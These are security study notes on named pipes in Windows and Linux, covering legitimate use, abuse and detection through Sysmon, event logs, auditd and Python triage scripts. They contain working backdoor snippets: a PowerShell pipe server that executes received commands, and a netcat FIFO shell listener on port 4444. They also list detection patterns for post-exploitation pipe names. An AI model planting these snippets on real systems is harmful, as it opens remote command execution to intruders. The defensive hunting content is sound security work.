## Table of Contents
- [[#What is a Named Pipe?|What is a Named Pipe?]]
- [[#Windows Named Pipes|Windows Named Pipes]]
- [[#Windows Named Pipes#Possible Legitimate Use|Possible Legitimate Use]]
- [[#Possible Legitimate Use#Creating & Using a Named Pipe in PowerShell|Creating & Using a Named Pipe in PowerShell]]
- [[#Windows Named Pipes#Abuse Example|Abuse Example]]
- [[#Abuse Example#Using Named Pipes for Remote Code Execution|Using Named Pipes for Remote Code Execution]]
- [[#Using Named Pipes for Remote Code Execution#Attacker creates a named pipe and executes commands through it (Cobalt Strike-style).|Attacker creates a named pipe and executes commands through it (Cobalt Strike-style).]]
- [[#Using Named Pipes for Remote Code Execution#Client Process (Attacker’s Command Injection)|Client Process (Attacker’s Command Injection)]]
- [[#Windows Named Pipes#Defending Against Named Pipe Attacks|Defending Against Named Pipe Attacks]]
- [[#Defending Against Named Pipe Attacks#Detect Named Pipe Abuse with Sysmon|Detect Named Pipe Abuse with Sysmon]]
- [[#Defending Against Named Pipe Attacks#Windows Event ID's to Hunt for if Sysmon not available|Windows Event ID's to Hunt for if Sysmon not available]]
- [[#Windows Event ID's to Hunt for if Sysmon not available#1. Hunting for Suspicious Named Pipe Creation (4688)|1. Hunting for Suspicious Named Pipe Creation (4688)]]
- [[#Windows Event ID's to Hunt for if Sysmon not available#2. Detecting Remote Named Pipe Access (5145)|2. Detecting Remote Named Pipe Access (5145)]]
- [[#Windows Event ID's to Hunt for if Sysmon not available#3. Finding Unauthorized Access to Named Pipes (4656, 4658, 4663)|3. Finding Unauthorized Access to Named Pipes (4656, 4658, 4663)]]
- [[#Windows Named Pipes#Summary|Summary]]
- [[#Linux Named Pipes|Linux Named Pipes]]
- [[#Linux Named Pipes#Legitimate Use|Legitimate Use]]
- [[#Legitimate Use#Creating a Named Pipe (FIFO)|Creating a Named Pipe (FIFO)]]
- [[#Linux Named Pipes#Abuse Example: Reverse Shell via a Named Pipe|Abuse Example: Reverse Shell via a Named Pipe]]
- [[#Abuse Example: Reverse Shell via a Named Pipe#Attacker creates a named pipe for covert communication.|Attacker creates a named pipe for covert communication.]]
- [[#Abuse Example: Reverse Shell via a Named Pipe#Attacker’s Side (Receiving Commands)|Attacker’s Side (Receiving Commands)]]
- [[#Linux Named Pipes#Defending Against Named Pipe Attacks|Defending Against Named Pipe Attacks]]
- [[#Defending Against Named Pipe Attacks#Linux: Find Open Named Pipes|Linux: Find Open Named Pipes]]
- [[#Defending Against Named Pipe Attacks#Other Linux Tools for Detection|Other Linux Tools for Detection]]
- [[#Linux Named Pipes#Locate Named Pipes on the System|Locate Named Pipes on the System]]
- [[#Linux Named Pipes#Find Processes Using Named Pipes|Find Processes Using Named Pipes]]
- [[#Find Processes Using Named Pipes#Example Output|Example Output]]
- [[#Linux Named Pipes#Monitor Named Pipe Access in Real Time|Monitor Named Pipe Access in Real Time]]
- [[#Monitor Named Pipe Access in Real Time#Example Alert|Example Alert]]
- [[#Linux Named Pipes#Monitor Named Pipe Activity with auditd|Monitor Named Pipe Activity with auditd]]
- [[#Monitor Named Pipe Activity with auditd#Enable auditing for named pipes|Enable auditing for named pipes]]
- [[#Linux Named Pipes#Check logs later|Check logs later]]
- [[#Linux Named Pipes#Trace Named Pipe Activity with strace|Trace Named Pipe Activity with strace]]
- [[#Trace Named Pipe Activity with strace#Example Output (Suspicious Activity)|Example Output (Suspicious Activity)]]
- [[#Linux Named Pipes#Detect Named Pipe-Based Reverse Shells|Detect Named Pipe-Based Reverse Shells]]
- [[#Detect Named Pipe-Based Reverse Shells#Malicious Shell Example (Listener)|Malicious Shell Example (Listener)]]
- [[#Detect Named Pipe-Based Reverse Shells#Detect Running Reverse Shell|Detect Running Reverse Shell]]
- [[#Detect Named Pipe-Based Reverse Shells#Summary|Summary]]
---
## What is a Named Pipe?
- A method for inter-process communication.
- The same concept exists in both Windows and Linux environments, but the implementations differ slightly.
**Essentially:**
- A process creates a pipe and names it
- Other processes can connect to that named pipe
- Data communication/exchange occurs between those processes
---
## Windows Named Pipes
### Possible Legitimate Use
- A SQL Server instance may use named pipes as an internal communication channel with local applications, i.e. letting an application talk to a database instance on the same machine.
- This means that no network connections have to be made.
- Tools like [[PsExec|PsExec]] are often abused, but it is important to remember that PsExec is a Microsoft tool with legitimate use cases. It also uses named pipes, carried over SMB, to communicate with the service it creates on the remote host.
#### Creating & Using a Named Pipe in PowerShell
```powershell
$pipeName = "MyPipe"   # pass only the short name; the class prepends \\.\pipe\ itself
$server = New-Object System.IO.Pipes.NamedPipeServerStream($pipeName)
Write-Host "Named Pipe Created: \\.\pipe\$pipeName"
$server.Dispose()      # release the pipe handle when finished
```
This creates a named pipe called `MyPipe` that processes can use for inter-process communication.
---
### Abuse Example
#### Using Named Pipes for Remote Code Execution
##### Attacker creates a named pipe and executes commands through it (Cobalt Strike-style).
```powershell
[System.IO.Pipes.NamedPipeServerStream]$pipe = New-Object System.IO.Pipes.NamedPipeServerStream("evilpipe")
while ($true) {
    $pipe.WaitForConnection()
    $reader = New-Object System.IO.StreamReader($pipe)
    $cmd = $reader.ReadLine()
    Invoke-Expression $cmd
    $pipe.Disconnect()
}
```
- **What happens?**
- The script waits for a command over the pipe `evilpipe`, executes it, then resets.
- An **attacker** can send commands secretly via this pipe.
##### Client Process (Attacker’s Command Injection)
```powershell
$pipe = New-Object System.IO.Pipes.NamedPipeClientStream(".", "evilpipe", "InOut")
$pipe.Connect()  # required before any write; otherwise the stream is not yet attached to the pipe
$writer = New-Object System.IO.StreamWriter($pipe)
$writer.WriteLine("whoami") # Runs 'whoami' on the compromised system
$writer.Flush()
$writer.Close()
```
- **Impact:** Attackers use named pipes for **stealthy command execution**, often avoiding detection.
---
### Defending Against Named Pipe Attacks
#### Detect Named Pipe Abuse with Sysmon
```powershell
# Sysmon Event ID 17 = PipeCreated, 18 = PipeConnected
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; ID=17,18} | Select-Object -First 10
```
- Monitors named pipe creation (17) and connection attempts (18); both records carry the pipe name, the image and the process ID.
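To show what to do with those records once they are exported, here is an added triage script (not part of this note and not a Sysmon tool) that parses the event XML from `wevtutil qe Microsoft-Windows-Sysmon/Operational /f:xml` (wrapped in one `<Events>` root) or a SIEM export, and flags two things: pipe names matching known post-exploitation defaults, and pipes created or connected to by scripting hosts such as `powershell.exe`, `cmd.exe` or `rundll32.exe`. The four sample records are constructed, and the `KNOWN_BAD` list is only a starting point.

```python
"""Triage Sysmon Event ID 17 (PipeCreated) and 18 (PipeConnected) records.

Input is event XML as produced by
  wevtutil qe Microsoft-Windows-Sysmon/Operational /f:xml
wrapped in one <Events> root, or a SIEM export. The EventData field names used
here (PipeName, Image, ProcessId, UtcTime) are the ones Sysmon writes.
"""
import re
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Scripting / proxy-execution hosts that have little reason to own a pipe.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "rundll32.exe",
                "mshta.exe", "wscript.exe", "cscript.exe"}

# Starting list of pipe-name patterns tied to post-exploitation tooling: Cobalt
# Strike's documented defaults (msagent_##, postex_####, MSSE-###-server), the
# RemCom service pipe, and this note's own example name. Extend from your intel.
KNOWN_BAD = [
    re.compile(r"^\\msagent_[0-9a-f]{2}$", re.I),
    re.compile(r"^\\postex_[0-9a-f]{4}$", re.I),
    re.compile(r"^\\msse-\d+-server$", re.I),
    re.compile(r"^\\remcom", re.I),
    re.compile(r"^\\evilpipe$", re.I),
]

# Constructed sample export: four records, two of them suspicious.
SAMPLE_XML = r"""<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>17</EventID></System>
 <EventData><Data Name="UtcTime">2024-05-01 10:00:00.000</Data><Data Name="ProcessId">820</Data>
  <Data Name="PipeName">\srvsvc</Data><Data Name="Image">C:\Windows\System32\svchost.exe</Data></EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>17</EventID></System>
 <EventData><Data Name="UtcTime">2024-05-01 10:05:12.000</Data><Data Name="ProcessId">4321</Data>
  <Data Name="PipeName">\evilpipe</Data><Data Name="Image">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data></EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>18</EventID></System>
 <EventData><Data Name="UtcTime">2024-05-01 10:05:40.000</Data><Data Name="ProcessId">5120</Data>
  <Data Name="PipeName">\msagent_3f</Data><Data Name="Image">C:\Windows\System32\rundll32.exe</Data></EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>17</EventID></System>
 <EventData><Data Name="UtcTime">2024-05-01 10:06:00.000</Data><Data Name="ProcessId">1500</Data>
  <Data Name="PipeName">\spoolss</Data><Data Name="Image">C:\Windows\System32\spoolsv.exe</Data></EventData>
</Event>
</Events>"""


def parse_pipe_events(xml_text):
    """Return one dict per Sysmon 17/18 record in the export; other IDs are skipped."""
    events = []
    for ev in ET.fromstring(xml_text).iter(f"{{{NS['e']}}}Event"):
        eid = ev.findtext("e:System/e:EventID", namespaces=NS)
        if eid not in ("17", "18"):
            continue
        data = {d.get("Name"): (d.text or "") for d in ev.findall("e:EventData/e:Data", NS)}
        events.append({"event_id": int(eid), "time": data.get("UtcTime", ""),
                       "pid": data.get("ProcessId", ""), "pipe": data.get("PipeName", ""),
                       "image": data.get("Image", "")})
    return events


def triage(events):
    """Attach a list of reasons to every record that trips a rule; clean records are dropped."""
    findings = []
    for ev in events:
        image = ev["image"].rsplit("\\", 1)[-1].lower()
        reasons = []
        if any(p.match(ev["pipe"]) for p in KNOWN_BAD):
            reasons.append("pipe name matches a known post-exploitation pattern")
        if image in SCRIPT_HOSTS:
            verb = "created" if ev["event_id"] == 17 else "connected to"
            reasons.append(f"scripting host {image} {verb} pipe {ev['pipe']}")
        if reasons:
            findings.append({**ev, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage(parse_pipe_events(SAMPLE_XML)):
        print(f"{f['time']} EID {f['event_id']} pid {f['pid']} {f['pipe']}: " + "; ".join(f["reasons"]))
```

On the sample, the `svchost.exe`/`\srvsvc` and `spoolsv.exe`/`\spoolss` records pass, while the `powershell.exe` pipe and the `rundll32.exe` connection to `\msagent_3f` each trip both rules. A host-specific baseline of expected pipe names is the natural next filter, but it has to be built from your own fleet rather than a generic list.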
#### Windows Event ID's to Hunt for if Sysmon not available
| **#** | **Event ID** | **Log Source** | **Description** | **Use Case** |
| ----- | ------------ | -------------- | --------------------- | ---------------------------------------------------------------- |
| **1** | 4688 | Security | Process Creation | Identify suspicious processes creating/accessing named pipes. |
| **2** | 5145 | Security | Object Access via SMB | Detect remote access to named pipes over SMB (Lateral Movement). |
| **3** | 4656 | Security | Handle Request | Track attempts to access named pipes (who accessed what). |
| **4** | 4658 | Security | Handle Closed | Shows when access to a named pipe is closed. |
| **5** | 4663 | Security | Object Access | Detects interaction with a specific named pipe. |
##### 1. Hunting for Suspicious Named Pipe Creation (4688)
- Track processes that create named pipes (e.g., `cmd.exe`, `powershell.exe`, `rundll32.exe`).
**PowerShell Example (Event Viewer Query)**
```powershell
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4688} | Select-Object -First 10
```
**Example Suspicious Entry**
```text
New Process Name: C:\Windows\System32\cmd.exe
Command Line: cmd.exe /c \\.\pipe\evilpipe
```
**Why it matters:** A named pipe with a **non-standard name** (e.g., `evilpipe`) could be a backdoor.
---
##### 2. Detecting Remote Named Pipe Access (5145)
- Tracks **remote access to named pipes over SMB**.
**PowerShell Query:**
```powershell
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=5145} | Select-Object -First 10
```
**Look for suspicious named pipes like:**
```text
Object Name: \PIPE\samr
Object Name: \PIPE\lsarpc
```
**Why it matters:**
- `\PIPE\samr` and `\PIPE\lsarpc` are used in Pass-the-Hash (PTH) attacks.
- Attackers use these to query domain info or escalate privileges.
---
##### 3. Finding Unauthorized Access to Named Pipes (4656, 4658, 4663)
- These **track access to named pipes**, showing **who opened/closed them**.
**Example PowerShell Query for Named Pipe Access (4656, 4663)**
```powershell
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4656} | Select-Object -First 10
```
**Example Log Entry:**
```text
Subject: User: ATTACKER-PC\attacker
Object Name: \PIPE\evil_pipe
Access: ReadData (or WriteData)
```
**Why it matters:**
- Shows **which user or process accessed a pipe**.
- If a low-privilege user is accessing a **SYSTEM-level** pipe, this could indicate **privilege escalation**.
---
### Summary
- Attackers use named pipes for **lateral movement & execution** (e.g., Cobalt Strike, Mimikatz, [[PsExec|PsExec]]).
- **Detection:** Monitor Sysmon and Windows Event logs to spot potential abuse.
- If **Sysmon isn’t available**, use **Windows Event Logs**:
- **4688** → Process creation (hunt for processes making named pipes).
- **5145** → Remote named pipe access via SMB (lateral movement).
- **4656, 4658, 4663** → Object access logs (track who accessed what pipes).
- **Hunt for unusual pipes** (e.g., `evilpipe`, `remcom`, `spoolss`).
- **Correlate events** to spot abuse (e.g., `4688` + `5145` = remote execution via named pipes).
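The `4688` + `5145` pairing above is easy to describe and fiddly to do by eye, so here is an added correlation script (not from this note) that works on records already flattened into dicts keyed by the Security log's own EventData field names (`ShareName`, `RelativeTargetName`, `IpAddress`, `NewProcessName`, `SubjectUserName`), as you would get from `Get-WinEvent` plus `ToXml()` or from a SIEM. It first picks out `5145` records that open a sensitive pipe on `IPC$` from a non-local address, then pairs each with execution-host `4688` records on the same computer inside a time window. The six sample records are constructed; `SENSITIVE_PIPES` and `EXEC_IMAGES` are assumptions you should tune.

```python
"""Correlate Security-log 5145 (network share object access) with 4688 (process
creation): the '4688 + 5145' pairing recommended in the Summary. Records are
plain dicts keyed by the EventData field names the Security log uses.
"""
from datetime import datetime, timedelta

# RPC endpoints behind IPC$ that matter for recon and lateral movement: the
# note's samr / lsarpc plus the service-control, task-scheduler and registry pipes.
SENSITIVE_PIPES = {"samr", "lsarpc", "svcctl", "atsvc", "winreg"}
EXEC_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe", "rundll32.exe"}
LOCAL_ADDRS = {"127.0.0.1", "::1", "-"}
WINDOW = timedelta(seconds=60)

# Constructed sample (UTC): a backup account touching srvsvc (normal), then jdoe
# hitting samr and svcctl from 10.0.0.99 followed by PSEXESVC spawning cmd.exe,
# and an unrelated interactive cmd.exe much later.
EVENTS = [
    {"EventID": 5145, "Time": "2024-05-01T10:00:01", "Computer": "FS01",
     "SubjectUserName": "svc_backup", "IpAddress": "10.0.0.55",
     "ShareName": r"\\*\IPC$", "RelativeTargetName": "srvsvc"},
    {"EventID": 5145, "Time": "2024-05-01T10:02:10", "Computer": "FS01",
     "SubjectUserName": "jdoe", "IpAddress": "10.0.0.99",
     "ShareName": r"\\*\IPC$", "RelativeTargetName": "samr"},
    {"EventID": 5145, "Time": "2024-05-01T10:02:11", "Computer": "FS01",
     "SubjectUserName": "jdoe", "IpAddress": "10.0.0.99",
     "ShareName": r"\\*\IPC$", "RelativeTargetName": "svcctl"},
    {"EventID": 4688, "Time": "2024-05-01T10:02:13", "Computer": "FS01",
     "SubjectUserName": "FS01$", "NewProcessName": r"C:\Windows\PSEXESVC.exe",
     "ParentProcessName": r"C:\Windows\System32\services.exe", "CommandLine": "PSEXESVC.exe"},
    {"EventID": 4688, "Time": "2024-05-01T10:02:14", "Computer": "FS01",
     "SubjectUserName": "jdoe", "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "ParentProcessName": r"C:\Windows\PSEXESVC.exe", "CommandLine": "cmd.exe /c whoami"},
    {"EventID": 4688, "Time": "2024-05-01T11:30:00", "Computer": "FS01",
     "SubjectUserName": "jdoe", "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "ParentProcessName": r"C:\Windows\explorer.exe", "CommandLine": "cmd.exe"},
]


def _t(ev):
    return datetime.fromisoformat(ev["Time"])


def image_name(path):
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def remote_pipe_access(events):
    """5145 records that open a sensitive pipe on IPC$ from a non-local address."""
    return [ev for ev in events
            if ev["EventID"] == 5145
            and ev["ShareName"].upper().endswith("IPC$")
            and ev["RelativeTargetName"].lower() in SENSITIVE_PIPES
            and ev["IpAddress"] not in LOCAL_ADDRS]


def correlate(events, window=WINDOW):
    """Pair each remote sensitive-pipe access with execution-host 4688 records
    that follow it on the same computer within `window`. Returns a list of
    (access_event, [process_events]) for accesses that have at least one follower."""
    procs = [ev for ev in events
             if ev["EventID"] == 4688 and image_name(ev["NewProcessName"]) in EXEC_IMAGES]
    pairs = []
    for access in remote_pipe_access(events):
        t0 = _t(access)
        followers = [p for p in procs
                     if p["Computer"] == access["Computer"] and t0 <= _t(p) <= t0 + window]
        if followers:
            pairs.append((access, followers))
    return pairs


if __name__ == "__main__":
    for access, procs in correlate(EVENTS):
        print(f"{access['Time']} {access['IpAddress']} -> {access['RelativeTargetName']} "
              f"as {access['SubjectUserName']}, followed by:")
        for p in procs:
            print(f"    {p['Time']} {p['CommandLine']} (parent {image_name(p['ParentProcessName'])})")
```

On the sample, the `srvsvc` access is not sensitive and is ignored, while the `samr` and `svcctl` accesses from `10.0.0.99` both pair with the `cmd.exe /c whoami` spawned four seconds later under `PSEXESVC.exe`; the interactive `cmd.exe` at 11:30 falls outside the window. Shrinking the window to one second drops both pairs, which is the knob to turn if a noisy environment produces too many coincidental matches.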
---
## Linux Named Pipes
### Legitimate Use
- May be used for logging or monitoring.
- An application writes its log data to a named pipe, and a logging or monitoring process reads from that pipe.
#### Creating a Named Pipe (FIFO)
```bash
mkfifo /tmp/mypipe
echo "Hello, Pipe!" > /tmp/mypipe &
cat /tmp/mypipe
```
- Creates a named pipe `/tmp/mypipe`, writes to it, and then reads its contents.
---
### Abuse Example: Reverse Shell via a Named Pipe
#### Attacker creates a named pipe for covert communication.
```bash
mkfifo /tmp/backpipe
nc -lvp 4444 0</tmp/backpipe | /bin/bash > /tmp/backpipe 2>&1
```
- **What happens?**
- A named pipe (`backpipe`) is used to send and receive commands in a reverse shell.
- [[Netcat|Netcat]] (`nc`) listens for incoming commands and executes them, sending output back through the pipe.
#### Attacker’s Side (Receiving Commands)
```bash
nc <TARGET_IP> 4444
whoami
```
- **Impact:** Attackers use named pipes to **bypass security tools**, making malicious activity harder to detect.
---
### Defending Against Named Pipe Attacks
#### Linux: Find Open Named Pipes
```bash
# Lists named pipes in '/tmp', a common attack location ('p' as the first character of the mode column).
ls -l /tmp | grep '^p'
# Finds active processes holding pipes open ('FIFO' in the TYPE column)
lsof | grep FIFO
```
- In `ls -l` output a named pipe's file type is shown as `p` in the first character of the mode column, which is why the grep is anchored to the start of the line (an unanchored `grep "p"` would match any file name containing a `p`). Note that `lsof` reports anonymous pipes as `FIFO` as well; named pipes are the entries whose NAME column is a filesystem path rather than `pipe`.
#### Other Linux Tools for Detection
|**Tool/Command**|**Usage**|**Relevance to Named Pipes**|
|---|---|---|
|`ls -l`|List files|Identifies FIFO pipes (`p` in file type).|
|`find`|Search files|Locates named pipes across the system.|
|`lsof`|List open files|Shows processes using named pipes.|
|`inotifywait`|File monitoring|Detects when named pipes are created/accessed.|
|`auditd`|Kernel audit logs|Logs named pipe access (better for security monitoring).|
|`ps aux`|Process monitoring|Checks for processes interacting with pipes.|
|`strace`|System call tracing|Traces syscalls related to named pipes.|
### Locate Named Pipes on the System
```bash
find / -type p 2>/dev/null
```
- Searches for **all named pipes** (`p`-type files) on the system. Unix domain sockets such as `docker.sock` are type `s`, not `p`, and will not appear; use `find / -type s` for those.
**Example Output:**
```bash
/tmp/malicious_pipe
/run/systemd/inhibit/1.ref
```
```
- **Red Flags:**
- Named pipes in `/tmp/` or `/dev/shm/`
- Often used for malware & persistence (web shells).
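As an added example (not from this note), the following script does what `find / -type p` does but keeps the location logic in one place: it walks the filesystem without following symlinks, skips `/proc` and `/sys`, collects every FIFO, and separates the ones living under world-writable staging directories (`/tmp`, `/var/tmp`, `/dev/shm`) from the rest. The `SUSPECT_DIRS` and `SKIP_DIRS` lists are assumptions to adjust per host.

```python
"""Enumerate named pipes the way `find / -type p` does and flag the ones that sit
in world-writable staging directories. Linux; reads the filesystem directly."""
import os
import stat

SUSPECT_DIRS = ("/tmp", "/var/tmp", "/dev/shm")
SKIP_DIRS = {"/proc", "/sys"}   # pseudo-filesystems: no FIFOs, slow to walk


def find_fifos(roots=("/",)):
    """Return paths of every FIFO below `roots`; unreadable entries are skipped
    and symlinks are not followed (lstat), so a link to a FIFO does not count."""
    found = []
    for root in roots:
        for dirpath, dirnames, filenames in os.walk(root, onerror=lambda err: None):
            dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
            for name in filenames:       # os.walk reports FIFOs among the "files"
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue
                if stat.S_ISFIFO(st.st_mode):
                    found.append(path)
    return found


def flag(fifos, suspect_dirs=SUSPECT_DIRS):
    """Split FIFO paths into (flagged, expected); flagged ones live under a suspect dir."""
    flagged, expected = [], []
    for path in fifos:
        under = any(path == d or path.startswith(d.rstrip("/") + "/") for d in suspect_dirs)
        (flagged if under else expected).append(path)
    return flagged, expected


def owner(path):
    """(uid, mode-string) of a FIFO, for the report line."""
    st = os.lstat(path)
    return st.st_uid, stat.filemode(st.st_mode)


if __name__ == "__main__":
    flagged, expected = flag(find_fifos())
    for path in flagged:
        uid, mode = owner(path)
        print(f"FLAG  {mode} uid={uid} {path}")
    print(f"{len(expected)} other FIFO(s) outside suspect directories")
```

Expected hits outside the suspect directories on a systemd host include `/run/systemd/inhibit/*.ref`, which logind creates as FIFOs; anything under `/tmp` or `/dev/shm` owned by a service account deserves a look at which process holds it open.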
---
### Find Processes Using Named Pipes
```bash
lsof | grep FIFO
```
- Lists processes currently using named pipes.
#### Example Output
```bash
bash 1234 user 3w FIFO 0,10 0 /tmp/malicious_pipe
```
- **Red Flags:** **Unexpected** processes (e.g., `nc`, `bash`, `python`) using FIFOs.
---
### Monitor Named Pipe Access in Real Time
```bash
inotifywait -m /tmp --format '%w%f %e' -e create
```
- Watches `/tmp` for **new files** being created, including named pipes. `inotifywait` cannot filter on file type, so confirm that a reported path is a FIFO with `ls -l` or `find <path> -type p`.
#### Example Alert
```bash
/tmp/evilpipe CREATE
```
- **Red Flags:** Pipes created dynamically in common attack directories (`/tmp`, `/dev/shm`).
---
### Monitor Named Pipe Activity with auditd
#### Enable auditing for named pipes
```bash
auditctl -w /tmp/ -p rwxa -k named_pipe_monitor
```
- Logs **read, write, execute, and attribute changes** in `/tmp/`.
### Check logs later
```bash
ausearch -k named_pipe_monitor
```
- **Red Flags:** Unexpected access to named pipes by non-root users.
---
### Trace Named Pipe Activity with strace
```bash
strace -e trace=open,openat,read,write -p <PID>
```
- Attaches to a **process ID (PID)** and prints its file syscalls, which shows the **named pipe interactions**. `openat` is included because modern libc routes `open()` through it, so tracing `open` alone would miss the pipe being opened.
#### Example Output (Suspicious Activity)
```text
open("/tmp/backpipe", O_WRONLY) = 3
write(3, "whoami", 6)
```
- **Red Flags:** Pipes being used for **command injection or reverse shells**.
---
### Detect Named Pipe-Based Reverse Shells
#### Malicious Shell Example (Listener)
```bash
mkfifo /tmp/backpipe
nc -lvp 4444 0</tmp/backpipe | /bin/bash > /tmp/backpipe 2>&1
```
- Attacker creates a **named pipe for remote command execution**.
#### Detect Running Reverse Shell
```bash
ps aux | grep -w '[n]c'   # the [n] trick keeps the grep itself out of the results
lsof -i :4444             # who is bound to, or connected on, the listener port
```
- **Red Flags:**
- Netcat (`nc`) listening with a **pipe as input/output**.
- Unknown users running **bash via FIFO pipes**.
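The two red flags above are the process-side view: a shell or netcat whose standard descriptors are wired to a named pipe, possibly with a listening socket. Here is an added checker (not from this note) that reads `/proc` directly, which is what `ps` and `lsof` do: for each process whose name is in `SHELL_NAMES`, it looks at fds 0 to 2, keeps those that resolve to a FIFO with a filesystem path (anonymous pipes appear as `pipe:[inode]` and are ignored), and reports any TCP port the process is listening on by matching its socket inodes against `/proc/net/tcp`. `SHELL_NAMES` is an assumption; Linux only.

```python
"""Process-side check for the listener pattern above: a shell or netcat whose
stdin/stdout/stderr is wired to a named pipe, plus any TCP port that process is
listening on. Reads /proc directly, which is what `lsof` and `ps` do. Linux only."""
import os
import stat

SHELL_NAMES = {"nc", "ncat", "netcat", "bash", "sh", "dash", "python3", "perl"}


def comm(pid):
    """Short process name from /proc/<pid>/comm ('' if the process is gone)."""
    try:
        with open(f"/proc/{pid}/comm") as fh:
            return fh.read().strip()
    except OSError:
        return ""


def std_fifos(pid):
    """{fd: path} for fds 0-2 that point at a named pipe. Anonymous pipes show up
    as 'pipe:[inode]' and are ignored: only FIFOs with a filesystem path count."""
    result = {}
    for fd in (0, 1, 2):
        link = f"/proc/{pid}/fd/{fd}"
        try:
            target = os.readlink(link)
            st = os.stat(link)          # stat follows the fd link to the open file
        except OSError:
            continue
        if stat.S_ISFIFO(st.st_mode) and not target.startswith("pipe:"):
            result[fd] = target
    return result


def listening_ports():
    """{socket inode: port} for every TCP socket in LISTEN state (state code 0A)."""
    ports = {}
    for table in ("/proc/net/tcp", "/proc/net/tcp6"):
        try:
            with open(table) as fh:
                next(fh)                # column header
                for line in fh:
                    cols = line.split()
                    if cols[3] == "0A":
                        ports[cols[9]] = int(cols[1].rsplit(":", 1)[1], 16)
        except OSError:
            continue
    return ports


def socket_inodes(pid):
    """Inodes of the sockets a process holds open."""
    inodes = set()
    try:
        for fd in os.listdir(f"/proc/{pid}/fd"):
            target = os.readlink(f"/proc/{pid}/fd/{fd}")
            if target.startswith("socket:["):
                inodes.add(target[8:-1])
    except OSError:
        pass
    return inodes


def scan(pids=None, names=SHELL_NAMES):
    """Findings for processes named in `names` whose standard fds sit on a named pipe."""
    listen = listening_ports()
    if pids is None:
        pids = [p for p in os.listdir("/proc") if p.isdigit()]
    findings = []
    for pid in map(str, pids):
        name = comm(pid)
        if name not in names:
            continue
        fifos = std_fifos(pid)
        if not fifos:
            continue
        ports = sorted(listen[i] for i in socket_inodes(pid) if i in listen)
        findings.append({"pid": int(pid), "comm": name, "fifos": fifos, "listening": ports})
    return findings


if __name__ == "__main__":
    for f in scan():
        print(f"pid {f['pid']} ({f['comm']}) fifos={f['fifos']} listening={f['listening']}")
```

Run as root to see every user's processes; as an unprivileged user `/proc/<pid>/fd` is only readable for your own, and those processes silently produce no finding. For the listener in the abuse example, `nc` would show fd 0 on `/tmp/backpipe` with port 4444 listening, and `bash` would show fds 1 and 2 on the same path.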
---
#### Summary
- Named pipes can be used for **reverse shells & data exfiltration**.
- **Detection:** Monitor FIFO files to spot abuse.
| **Action** | **Command** | **Why?** |
| -------------------------------------- | ------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------- |
| **Find Named Pipes** | `find / -type p` | Identifies FIFO files across the system. |
| **List Processes Using Named Pipes** | `lsof \| grep FIFO` | Detects active processes interacting with named pipes. |
| **Monitor Pipe Creation in Real-Time** | `inotifywait -m /tmp -e create` | Detects new pipes in suspicious locations. |
| **Audit Named Pipe Activity** | `auditctl -w /tmp/ -p rwxa -k named_pipe_monitor` | Tracks who accessed named pipe for forensic analysis. |
| **Trace Pipe Interaction** | `strace -e trace=open,openat,read,write -p <PID>` | Catches command execution via named pipes. |
| **Detect Reverse Shells** | `ps aux \| grep -w '[n]c'; lsof -i :4444` | Finds named pipe-based backdoors & reverse shells.<br>Checks for Netcat and other tools listening for remote commands. |